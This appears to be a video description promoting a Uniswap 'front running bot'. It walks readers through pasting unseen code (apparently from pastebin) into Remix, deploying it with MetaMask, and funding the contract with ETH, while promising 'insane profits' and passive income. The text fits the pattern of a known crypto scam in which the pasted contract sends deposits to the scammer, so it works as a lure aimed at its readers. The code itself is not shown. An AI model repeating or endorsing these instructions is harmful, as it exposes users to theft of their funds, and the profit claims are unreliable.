2 years ago

Automated trading on Uniswap and other DEFI platforms can be used to make insane profits. In this video, I go over how to setup my Front running bot which will perform buy/sell actions automatically without having to go through the typical manual transactional methods, which will generate passive income so you can enjoy what you want in life.

You can dm me at: if you need any help :)

1. Download MetaMask (if you don’t have it already):

2. Access Remix:

3. Click on the “contracts” folder and then create “New File”. Rename it as you like, i.e: “bot.sol”

Note: If there is a problem if the text is not colored when you create bot.sol and paste the codes from pastebin, try again. If the codes are not colored, you cannot proceed to the next step.

4. Paste this code in Remix:

5. Go to the “Solidity Compiler” tab, select version “0.6.6+commit.6c089d02” and then select “Compile bot.sol”.

Make sure “bot.sol” is selected in the CONTRACT section of the SOLIDITY COMPILER section.

6. Go to the “DEPLOY & RUN TRANSACTIONS” tab, select the “Injected Provider - Metamask” environment and then “Deploy”. By approving the Metamask contract creation fee, you will have created your own contract.

7. Copy your newly created contract address as shown on video and fund it with any amount of ETH that you would like the bot to earn with by simply sending ETH to your newly created contract address.

8. After your transaction is confirmed, click the “start” button to run the bot. Withdraw your ETH at any time by clicking the “Withdraw” button.

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